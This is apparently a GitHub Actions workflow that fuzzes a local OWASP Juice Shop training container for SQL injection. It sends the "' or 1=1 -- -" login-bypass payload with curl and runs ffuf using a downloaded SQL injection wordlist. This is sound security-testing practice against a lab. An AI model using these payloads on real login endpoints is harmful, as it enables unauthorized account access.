name: MyFuzzing

on:
  push:
    branches: [ main ]
  workflow_dispatch:

permissions:
  contents: write
  pull-requests: write
  security-events: write
  actions: read

jobs:

  ffuf:
    runs-on: ubuntu-latest
    services:
        juice:
          image: bkimminich/juice-shop
          ports:
            - 3000:3000

    steps:
      - name: Wait for service
        run: |
            sleep 10 
            curl --path-as-is -i -s -k -X $'POST' \
              -H $'Host: localhost:3000' -H $'Content-Length: 43' -H $'Content-Type: application/json' -H $'Connection: keep-alive' \
              --data-binary $'{\"email\":\"\' or 1=1 -- -\",\"password\":\"pass\"}' \
              $'http://localhost:3000/rest/user/login'

      - name: Install fuzzing
        run: |
          go install github.com/ffuf/ffuf/v2@latest
          echo "$HOME/go/bin" >> $GITHUB_PATH

      - name: Get payloads
        run: |
          mkdir payloads
          wget -O payloads/sqli.txt https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/SQL-Injection
      

      - name: Run ffuf login (email)
        run: |
          mkdir -p artifacts
          ffuf -w payloads/sqli.txt -u 'http://localhost:3000/rest/user/login' -X POST -d 'email=FUZZ&password=pass' -ms 43 -o artifacts/ffuf.json

      - name: Save sample response diff 
        run: |
          jq '.results[:20]' artifacts/ffuf.json > artifacts/top_results.json

      

      - name: Get Logs from Service(docker)
        run: |
          docker logs $(docker ps -q --filter ancestor=bkimminich/juice-shop) > artifacts/juice-logs.log

      
      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: security-reports-bundle
          path: artifacts/
